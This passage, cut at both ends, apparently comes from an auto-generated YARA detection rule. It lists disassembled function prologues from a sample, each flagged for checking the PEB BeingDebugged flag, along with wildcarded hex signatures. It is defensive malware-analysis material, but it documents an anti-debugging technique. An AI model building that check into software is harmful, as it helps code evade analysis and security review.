local4124 + .text:0x004011d0 + .text:0x004011d0 55 push ebp + .text:0x004011d1 8bec mov ebp,esp + .text:0x004011d3 b818100000 mov eax,0x00001018 + .text:0x004011d8 e893270000 call 0x00403970 ;__alloca_probe() + .text:0x004011dd 53 push ebx + .text:0x004011de 56 push esi + .text:0x004011df 57 push edi + .text:0x004011e0 c785ecefffff0000 mov dword [ebp - 4116],0 + .text:0x004011ea c785e8efffff0000 mov dword [ebp - 4120],0 + .text:0x004011f4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004011fa 8a5802 mov bl,byte [eax + 2] + .text:0x004011fd 889df0efffff mov byte [ebp - 4112],bl + .text:0x00401203 0fbe85f0efffff movsx eax,byte [ebp - 4112] + .text:0x0040120a 85c0 test eax,eax + .text:0x0040120c 7405 jz 0x00401213 + */ + $c3 = { 55 8B EC B8 18 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x004014b0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004014b0 + .text:0x004014b0 FUNC: int cdecl sub_004014b0( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [8 XREFS] + .text:0x004014b0 + .text:0x004014b0 Stack Variables: (offset from initial top of stack) + .text:0x004014b0 28: int arg6 + .text:0x004014b0 24: int arg5 + .text:0x004014b0 20: int arg4 + .text:0x004014b0 16: int arg3 + .text:0x004014b0 12: int arg2 + .text:0x004014b0 8: int arg1 + .text:0x004014b0 4: int arg0 + .text:0x004014b0 -8: int local8 + .text:0x004014b0 -12: int local12 + .text:0x004014b0 -4108: int local4108 + .text:0x004014b0 -4112: int local4112 + .text:0x004014b0 -4116: int local4116 + .text:0x004014b0 -4120: int local4120 + .text:0x004014b0 -4124: int local4124 + .text:0x004014b0 -4128: int local4128 + .text:0x004014b0 + .text:0x004014b0 55 push ebp + .text:0x004014b1 8bec mov ebp,esp + .text:0x004014b3 b81c100000 mov eax,0x0000101c + .text:0x004014b8 e8b3240000 call 0x00403970 ;__alloca_probe() + .text:0x004014bd 53 push ebx + .text:0x004014be 56 push esi + .text:0x004014bf 57 push edi + .text:0x004014c0 c785e8efffff0000 mov dword [ebp - 4120],0 + .text:0x004014ca c785e4efffff0000 mov dword [ebp - 4124],0 + .text:0x004014d4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004014da 8a5802 mov bl,byte [eax + 2] + .text:0x004014dd 889decefffff mov byte [ebp - 4116],bl + .text:0x004014e3 0fbe85ecefffff movsx eax,byte [ebp - 4116] + .text:0x004014ea 85c0 test eax,eax + .text:0x004014ec 7405 jz 0x004014f3 + */ + $c4 = { 55 8B EC B8 1C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x004016c0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004016c0 + .text:0x004016c0 FUNC: int cdecl sub_004016c0( int arg0, int arg1, ) [2 XREFS] + .text:0x004016c0 + .text:0x004016c0 Stack Variables: (offset from initial top of stack) + .text:0x004016c0 8: int arg1 + .text:0x004016c0 4: int arg0 + .text:0x004016c0 -1028: int local1028 + .text:0x004016c0 -2052: int local2052 + .text:0x004016c0 -3076: int local3076 + .text:0x004016c0 -3080: int local3080 + .text:0x004016c0 -3084: int local3084 + .text:0x004016c0 -3088: int local3088 + .text:0x004016c0 + .text:0x004016c0 55 push ebp + .text:0x004016c1 8bec mov ebp,esp + .text:0x004016c3 81ec0c0c0000 sub esp,3084 + .text:0x004016c9 53 push ebx + .text:0x004016ca 56 push esi + .text:0x004016cb 57 push edi + .text:0x004016cc c785f8f3ffff0000 mov dword [ebp - 3080],0 + .text:0x004016d6 c785f4f3ffff0000 mov dword [ebp - 3084],0 + .text:0x004016e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004016e6 8a5802 mov bl,byte [eax + 2] + .text:0x004016e9 889dfcf3ffff mov byte [ebp - 3076],bl + .text:0x004016ef 0fbe85fcf3ffff movsx eax,byte [ebp - 3076] + .text:0x004016f6 85c0 test eax,eax + .text:0x004016f8 7405 jz 0x004016ff + */ + $c5 = { 55 8B EC 81 EC 0C 0C 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00401790@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401790 + .text:0x00401790 FUNC: int cdecl sub_00401790( int arg0, ) [2 XREFS] + .text:0x00401790 + .text:0x00401790 Stack Variables: (offset from initial top of stack) + .text:0x00401790 4: int arg0 + .text:0x00401790 -1028: int local1028 + .text:0x00401790 -2052: int local2052 + .text:0x00401790 -3076: int local3076 + .text:0x00401790 -4100: int local4100 + .text:0x00401790 -4104: int local4104 + .text:0x00401790 -4108: int local4108 + .text:0x00401790 -4112: int local4112 + .text:0x00401790 + .text:0x00401790 55 push ebp + .text:0x00401791 8bec mov ebp,esp + .text:0x00401793 b80c100000 mov eax,0x0000100c + .text:0x00401798 e8d3210000 call 0x00403970 ;__alloca_probe() + .text:0x0040179d 53 push ebx + .text:0x0040179e 56 push esi + .text:0x0040179f 57 push edi + .text:0x004017a0 c785f8efffff0000 mov dword [ebp - 4104],0 + .text:0x004017aa c785f4efffff0000 mov dword [ebp - 4108],0 + .text:0x004017b4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004017ba 8a5802 mov bl,byte [eax + 2] + .text:0x004017bd 889dfcefffff mov byte [ebp - 4100],bl + .text:0x004017c3 0fbe85fcefffff movsx eax,byte [ebp - 4100] + .text:0x004017ca 85c0 test eax,eax + .text:0x004017cc 7405 jz 0x004017d3 + */ + $c6 = { 55 8B EC B8 0C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00401880@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401880 + .text:0x00401880 FUNC: int cdecl sub_00401880( int arg0, int arg1, ) [2 XREFS] + .text:0x00401880 + .text:0x00401880 Stack Variables: (offset from initial top of stack) + .text:0x00401880 8: int arg1 + .text:0x00401880 4: int arg0 + .text:0x00401880 -12: int local12 + .text:0x00401880 -20: int local20 + .text:0x00401880 -28: int local28 + .text:0x00401880 -32: int local32 + .text:0x00401880 -36: int local36 + .text:0x00401880 -40: int local40 + .text:0x00401880 -44: int local44 + .text:0x00401880 + .text:0x00401880 55 push ebp + .text:0x00401881 8bec mov ebp,esp + .text:0x00401883 83ec28 sub esp,40 + .text:0x00401886 53 push ebx + .text:0x00401887 56 push esi + .text:0x00401888 57 push edi + .text:0x00401889 c745dc00000000 mov dword [ebp - 36],0 + .text:0x00401890 c745d800000000 mov dword [ebp - 40],0 + .text:0x00401897 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040189d 8a5802 mov bl,byte [eax + 2] + .text:0x004018a0 885de0 mov byte [ebp - 32],bl + .text:0x004018a3 0fbe45e0 movsx eax,byte [ebp - 32] + .text:0x004018a7 85c0 test eax,eax + .text:0x004018a9 7405 jz 0x004018b0 + */ + $c7 = { 55 8B EC 83 EC 28 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? } + /* +Basic Block at 0x004019b0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004019b0 + .text:0x004019b0 FUNC: int cdecl sub_004019b0( int arg0, ) [4 XREFS] + .text:0x004019b0 + .text:0x004019b0 Stack Variables: (offset from initial top of stack) + .text:0x004019b0 4: int arg0 + .text:0x004019b0 -1028: int local1028 + .text:0x004019b0 -1032: int local1032 + .text:0x004019b0 -1036: int local1036 + .text:0x004019b0 -1040: int local1040 + .text:0x004019b0 + .text:0x004019b0 55 push ebp + .text:0x004019b1 8bec mov ebp,esp + .text:0x004019b3 81ec0c040000 sub esp,1036 + .text:0x004019b9 53 push ebx + .text:0x004019ba 56 push esi + .text:0x004019bb 57 push edi + .text:0x004019bc c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x004019c6 c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x004019d0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004019d6 8a5802 mov bl,byte [eax + 2] + .text:0x004019d9 889dfcfbffff mov byte [ebp - 1028],bl + .text:0x004019df 0fbe85fcfbffff movsx eax,byte [ebp - 1028] + .text:0x004019e6 85c0 test eax,eax + .text:0x004019e8 7405 jz 0x004019ef + */ + $c8 = { 55 8B EC 81 EC 0C 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00401ab0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401ab0 + .text:0x00401ab0 FUNC: int cdecl sub_00401ab0( int arg0, int arg1, int arg2, ) [8 XREFS] + .text:0x00401ab0 + .text:0x00401ab0 Stack Variables: (offset from initial top of stack) + .text:0x00401ab0 12: int arg2 + .text:0x00401ab0 8: int arg1 + .text:0x00401ab0 4: int arg0 + .text:0x00401ab0 -404: int local404 + .text:0x00401ab0 -408: int local408 + .text:0x00401ab0 -420: int local420 + .text:0x00401ab0 -422: int local422 + .text:0x00401ab0 -424: int local424 + .text:0x00401ab0 -428: int local428 + .text:0x00401ab0 -432: int local432 + .text:0x00401ab0 -436: int local436 + .text:0x00401ab0 + .text:0x00401ab0 55 push ebp + .text:0x00401ab1 8bec mov ebp,esp + .text:0x00401ab3 81ecb0010000 sub esp,432 + .text:0x00401ab9 53 push ebx + .text:0x00401aba 56 push esi + .text:0x00401abb 57 push edi + .text:0x00401abc c78554feffff0000 mov dword [ebp - 428],0 + .text:0x00401ac6 c78550feffff0000 mov dword [ebp - 432],0 + .text:0x00401ad0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401ad6 8a5802 mov bl,byte [eax + 2] + .text:0x00401ad9 889d58feffff mov byte [ebp - 424],bl + .text:0x00401adf 0fbe8558feffff movsx eax,byte [ebp - 424] + .text:0x00401ae6 85c0 test eax,eax + .text:0x00401ae8 7405 jz 0x00401aef + */ + $c9 = { 55 8B EC 81 EC B0 01 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00401c20@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401c20 + .text:0x00401c20 FUNC: int cdecl sub_00401c20( int arg0, ) [24 XREFS] + .text:0x00401c20 + .text:0x00401c20 Stack Variables: (offset from initial top of stack) + .text:0x00401c20 4: int arg0 + .text:0x00401c20 -8: int local8 + .text:0x00401c20 -12: int local12 + .text:0x00401c20 -16: int local16 + .text:0x00401c20 + .text:0x00401c20 55 push ebp + .text:0x00401c21 8bec mov ebp,esp + .text:0x00401c23 83ec0c sub esp,12 + .text:0x00401c26 53 push ebx + .text:0x00401c27 56 push esi + .text:0x00401c28 57 push edi + .text:0x00401c29 c745f800000000 mov dword [ebp - 8],0 + .text:0x00401c30 c745f400000000 mov dword [ebp - 12],0 + .text:0x00401c37 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401c3d 8a5802 mov bl,byte [eax + 2] + .text:0x00401c40 885dfc mov byte [ebp - 4],bl + .text:0x00401c43 0fbe45fc movsx eax,byte [ebp - 4] + .text:0x00401c47 85c0 test eax,eax + .text:0x00401c49 7405 jz 0x00401c50 + */ + $c10 = { 55 8B EC 83 EC 0C 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? } + /* +Basic Block at 0x00401cd0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401cd0 + .text:0x00401cd0 FUNC: int cdecl sub_00401cd0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401cd0 + .text:0x00401cd0 Stack Variables: (offset from initial top of stack) + .text:0x00401cd0 12: int arg2 + .text:0x00401cd0 8: int arg1 + .text:0x00401cd0 4: int arg0 + .text:0x00401cd0 -8: int local8 + .text:0x00401cd0 -12: int local12 + .text:0x00401cd0 -524: int local524 + .text:0x00401cd0 -528: int local528 + .text:0x00401cd0 -532: int local532 + .text:0x00401cd0 -536: int local536 + .text:0x00401cd0 -540: int local540 + .text:0x00401cd0 -544: int local544 + .text:0x00401cd0 + .text:0x00401cd0 55 push ebp + .text:0x00401cd1 8bec mov ebp,esp + .text:0x00401cd3 81ec1c020000 sub esp,540 + .text:0x00401cd9 53 push ebx + .text:0x00401cda 56 push esi + .text:0x00401cdb 57 push edi + .text:0x00401cdc c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401ce3 c785e8fdffff0000 mov dword [ebp - 536],0 + .text:0x00401ced c785e4fdffff0000 mov dword [ebp - 540],0 + .text:0x00401cf7 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401cfd 8a5802 mov bl,byte [eax + 2] + .text:0x00401d00 889decfdffff mov byte [ebp - 532],bl + .text:0x00401d06 0fbe85ecfdffff movsx eax,byte [ebp - 532] + .text:0x00401d0d 85c0 test eax,eax + .text:0x00401d0f 7405 jz 0x00401d16 + */ + $c11 = { 55 8B EC 81 EC 1C 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00401e30@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00401e30 + .text:0x00401e30 FUNC: int cdecl sub_00401e30( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00401e30 + .text:0x00401e30 Stack Variables: (offset from initial top of stack) + .text:0x00401e30 12: int arg2 + .text:0x00401e30 8: int arg1 + .text:0x00401e30 4: int arg0 + .text:0x00401e30 -8: int local8 + .text:0x00401e30 -12: int local12 + .text:0x00401e30 -524: int local524 + .text:0x00401e30 -528: int local528 + .text:0x00401e30 -532: int local532 + .text:0x00401e30 -536: int local536 + .text:0x00401e30 -540: int local540 + .text:0x00401e30 -544: int local544 + .text:0x00401e30 -548: int local548 + .text:0x00401e30 + .text:0x00401e30 55 push ebp + .text:0x00401e31 8bec mov ebp,esp + .text:0x00401e33 81ec20020000 sub esp,544 + .text:0x00401e39 53 push ebx + .text:0x00401e3a 56 push esi + .text:0x00401e3b 57 push edi + .text:0x00401e3c c745fc00000000 mov dword [ebp - 4],0 + .text:0x00401e43 c785e4fdffff0000 mov dword [ebp - 540],0 + .text:0x00401e4d c785e0fdffff0000 mov dword [ebp - 544],0 + .text:0x00401e57 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401e5d 8a5802 mov bl,byte [eax + 2] + .text:0x00401e60 889de8fdffff mov byte [ebp - 536],bl + .text:0x00401e66 0fbe85e8fdffff movsx eax,byte [ebp - 536] + .text:0x00401e6d 85c0 test eax,eax + .text:0x00401e6f 7405 jz 0x00401e76 + */ + $c12 = { 55 8B EC 81 EC 20 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00402020@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402020 + .text:0x00402020 FUNC: int cdecl sub_00402020( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00402020 + .text:0x00402020 Stack Variables: (offset from initial top of stack) + .text:0x00402020 12: int arg2 + .text:0x00402020 8: int arg1 + .text:0x00402020 4: int arg0 + .text:0x00402020 -8: int local8 + .text:0x00402020 -12: int local12 + .text:0x00402020 -524: int local524 + .text:0x00402020 -528: int local528 + .text:0x00402020 -532: int local532 + .text:0x00402020 -536: int local536 + .text:0x00402020 -540: int local540 + .text:0x00402020 + .text:0x00402020 55 push ebp + .text:0x00402021 8bec mov ebp,esp + .text:0x00402023 81ec18020000 sub esp,536 + .text:0x00402029 53 push ebx + .text:0x0040202a 56 push esi + .text:0x0040202b 57 push edi + .text:0x0040202c c745f800000000 mov dword [ebp - 8],0 + .text:0x00402033 c785ecfdffff0000 mov dword [ebp - 532],0 + .text:0x0040203d c785e8fdffff0000 mov dword [ebp - 536],0 + .text:0x00402047 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040204d 8a5802 mov bl,byte [eax + 2] + .text:0x00402050 889df0fdffff mov byte [ebp - 528],bl + .text:0x00402056 0fbe85f0fdffff movsx eax,byte [ebp - 528] + .text:0x0040205d 85c0 test eax,eax + .text:0x0040205f 7405 jz 0x00402066 + */ + $c13 = { 55 8B EC 81 EC 18 02 00 00 53 56 57 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x004021b0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004021b0 + .text:0x004021b0 FUNC: int cdecl sub_004021b0( int arg0, int arg1, int arg2, int arg3, int arg4, ) [2 XREFS] + .text:0x004021b0 + .text:0x004021b0 Stack Variables: (offset from initial top of stack) + .text:0x004021b0 20: int arg4 + .text:0x004021b0 16: int arg3 + .text:0x004021b0 12: int arg2 + .text:0x004021b0 8: int arg1 + .text:0x004021b0 4: int arg0 + .text:0x004021b0 -8: int local8 + .text:0x004021b0 -1032: int local1032 + .text:0x004021b0 -1036: int local1036 + .text:0x004021b0 -1040: int local1040 + .text:0x004021b0 -1552: int local1552 + .text:0x004021b0 -1556: int local1556 + .text:0x004021b0 -1560: int local1560 + .text:0x004021b0 -1564: int local1564 + .text:0x004021b0 -1568: int local1568 + .text:0x004021b0 + .text:0x004021b0 55 push ebp + .text:0x004021b1 8bec mov ebp,esp + .text:0x004021b3 81ec1c060000 sub esp,1564 + .text:0x004021b9 53 push ebx + .text:0x004021ba 56 push esi + .text:0x004021bb 57 push edi + .text:0x004021bc c785f4fbffff0000 mov dword [ebp - 1036],0 + .text:0x004021c6 c785f8fbffff0000 mov dword [ebp - 1032],0 + .text:0x004021d0 c785e8f9ffff0000 mov dword [ebp - 1560],0 + .text:0x004021da c785e4f9ffff0000 mov dword [ebp - 1564],0 + .text:0x004021e4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004021ea 8a5802 mov bl,byte [eax + 2] + .text:0x004021ed 889decf9ffff mov byte [ebp - 1556],bl + .text:0x004021f3 0fbe85ecf9ffff movsx eax,byte [ebp - 1556] + .text:0x004021fa 85c0 test eax,eax + .text:0x004021fc 7405 jz 0x00402203 + */ + $c14 = { 55 8B EC 81 EC 1C 06 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00402440@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402440 + .text:0x00402440 FUNC: int cdecl sub_00402440( ) [6 XREFS] + .text:0x00402440 + .text:0x00402440 Stack Variables: (offset from initial top of stack) + .text:0x00402440 -8: int local8 + .text:0x00402440 -12: int local12 + .text:0x00402440 -16: int local16 + .text:0x00402440 -20: int local20 + .text:0x00402440 + .text:0x00402440 55 push ebp + .text:0x00402441 8bec mov ebp,esp + .text:0x00402443 83ec10 sub esp,16 + .text:0x00402446 53 push ebx + .text:0x00402447 56 push esi + .text:0x00402448 57 push edi + .text:0x00402449 c745f400000000 mov dword [ebp - 12],0 + .text:0x00402450 c745f000000000 mov dword [ebp - 16],0 + .text:0x00402457 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040245d 8a5802 mov bl,byte [eax + 2] + .text:0x00402460 885df8 mov byte [ebp - 8],bl + .text:0x00402463 0fbe45f8 movsx eax,byte [ebp - 8] + .text:0x00402467 85c0 test eax,eax + .text:0x00402469 7405 jz 0x00402470 + */ + $c15 = { 55 8B EC 83 EC 10 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? } + /* +Basic Block at 0x00402650@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402650 + .text:0x00402650 FUNC: int cdecl sub_00402650( int arg0, int arg1, ) [2 XREFS] + .text:0x00402650 + .text:0x00402650 Stack Variables: (offset from initial top of stack) + .text:0x00402650 8: int arg1 + .text:0x00402650 4: int arg0 + .text:0x00402650 -4100: int local4100 + .text:0x00402650 -4104: int local4104 + .text:0x00402650 -4120: int local4120 + .text:0x00402650 -4124: int local4124 + .text:0x00402650 -4128: int local4128 + .text:0x00402650 -4132: int local4132 + .text:0x00402650 -5156: int local5156 + .text:0x00402650 -5160: int local5160 + .text:0x00402650 -5164: int local5164 + .text:0x00402650 -5168: int local5168 + .text:0x00402650 -5172: int local5172 + .text:0x00402650 + .text:0x00402650 55 push ebp + .text:0x00402651 8bec mov ebp,esp + .text:0x00402653 b830140000 mov eax,0x00001430 + .text:0x00402658 e813130000 call 0x00403970 ;__alloca_probe() + .text:0x0040265d 53 push ebx + .text:0x0040265e 56 push esi + .text:0x0040265f 57 push edi + .text:0x00402660 c785e4efffff0010 mov dword [ebp - 4124],0x00001000 + .text:0x0040266a c785d4ebffff0000 mov dword [ebp - 5164],0 + .text:0x00402674 c785d0ebffff0000 mov dword [ebp - 5168],0 + .text:0x0040267e 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402684 8a5802 mov bl,byte [eax + 2] + .text:0x00402687 889dd8ebffff mov byte [ebp - 5160],bl + .text:0x0040268d 0fbe85d8ebffff movsx eax,byte [ebp - 5160] + .text:0x00402694 85c0 test eax,eax + .text:0x00402696 7405 jz 0x0040269d + */ + $c16 = { 55 8B EC B8 30 14 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 10 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00402880@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402880 + .text:0x00402880 FUNC: int cdecl sub_00402880( int arg0, ) [2 XREFS] + .text:0x00402880 + .text:0x00402880 Stack Variables: (offset from initial top of stack) + .text:0x00402880 4: int arg0 + .text:0x00402880 -1028: int local1028 + .text:0x00402880 -1032: int local1032 + .text:0x00402880 -1036: int local1036 + .text:0x00402880 -1040: int local1040 + .text:0x00402880 -1044: int local1044 + .text:0x00402880 -1048: int local1048 + .text:0x00402880 -1052: int local1052 + .text:0x00402880 -1056: int local1056 + .text:0x00402880 -1060: int local1060 + .text:0x00402880 -1064: int local1064 + .text:0x00402880 -1068: int local1068 + .text:0x00402880 -1072: int local1072 + .text:0x00402880 -1076: int local1076 + .text:0x00402880 + .text:0x00402880 55 push ebp + .text:0x00402881 8bec mov ebp,esp + .text:0x00402883 81ec30040000 sub esp,1072 + .text:0x00402889 53 push ebx + .text:0x0040288a 56 push esi + .text:0x0040288b 57 push edi + .text:0x0040288c c785d4fbffff0000 mov dword [ebp - 1068],0 + .text:0x00402896 c785d0fbffff0000 mov dword [ebp - 1072],0 + .text:0x004028a0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004028a6 8a5802 mov bl,byte [eax + 2] + .text:0x004028a9 889dd8fbffff mov byte [ebp - 1064],bl + .text:0x004028af 0fbe85d8fbffff movsx eax,byte [ebp - 1064] + .text:0x004028b6 85c0 test eax,eax + .text:0x004028b8 7405 jz 0x004028bf + */ + $c17 = { 55 8B EC 81 EC 30 04 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00402f40@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00402f40 + .text:0x00402f40 FUNC: int cdecl sub_00402f40( int arg0, ) [4 XREFS] + .text:0x00402f40 + .text:0x00402f40 Stack Variables: (offset from initial top of stack) + .text:0x00402f40 4: int arg0 + .text:0x00402f40 -1028: int local1028 + .text:0x00402f40 -1032: int local1032 + .text:0x00402f40 -2056: int local2056 + .text:0x00402f40 -3080: int local3080 + .text:0x00402f40 -4104: int local4104 + .text:0x00402f40 -5128: int local5128 + .text:0x00402f40 -5132: int local5132 + .text:0x00402f40 -5136: int local5136 + .text:0x00402f40 -5140: int local5140 + .text:0x00402f40 -5144: int local5144 + .text:0x00402f40 + .text:0x00402f40 55 push ebp + .text:0x00402f41 8bec mov ebp,esp + .text:0x00402f43 b814140000 mov eax,0x00001414 + .text:0x00402f48 e8230a0000 call 0x00403970 ;__alloca_probe() + .text:0x00402f4d 53 push ebx + .text:0x00402f4e 56 push esi + .text:0x00402f4f 57 push edi + .text:0x00402f50 c785f0ebffff0000 mov dword [ebp - 5136],0 + .text:0x00402f5a c785ecebffff0000 mov dword [ebp - 5140],0 + .text:0x00402f64 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00402f6a 8a5802 mov bl,byte [eax + 2] + .text:0x00402f6d 889df4ebffff mov byte [ebp - 5132],bl + .text:0x00402f73 0fbe85f4ebffff movsx eax,byte [ebp - 5132] + .text:0x00402f7a 85c0 test eax,eax + .text:0x00402f7c 7405 jz 0x00402f83 + */ + $c18 = { 55 8B EC B8 14 14 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x004032c0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x004032c0 + .text:0x004032c0 FUNC: int cdecl sub_004032c0( int arg0, ) [4 XREFS] + .text:0x004032c0 + .text:0x004032c0 Stack Variables: (offset from initial top of stack) + .text:0x004032c0 4: int arg0 + .text:0x004032c0 -1028: int local1028 + .text:0x004032c0 -1032: int local1032 + .text:0x004032c0 -2056: int local2056 + .text:0x004032c0 -3080: int local3080 + .text:0x004032c0 -3084: int local3084 + .text:0x004032c0 -3088: int local3088 + .text:0x004032c0 -3092: int local3092 + .text:0x004032c0 -3096: int local3096 + .text:0x004032c0 + .text:0x004032c0 55 push ebp + .text:0x004032c1 8bec mov ebp,esp + .text:0x004032c3 81ec140c0000 sub esp,3092 + .text:0x004032c9 53 push ebx + .text:0x004032ca 56 push esi + .text:0x004032cb 57 push edi + .text:0x004032cc c785f0f3ffff0000 mov dword [ebp - 3088],0 + .text:0x004032d6 c785ecf3ffff0000 mov dword [ebp - 3092],0 + .text:0x004032e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004032e6 8a5802 mov bl,byte [eax + 2] + .text:0x004032e9 889df4f3ffff mov byte [ebp - 3084],bl + .text:0x004032ef 0fbe85f4f3ffff movsx eax,byte [ebp - 3084] + .text:0x004032f6 85c0 test eax,eax + .text:0x004032f8 7405 jz 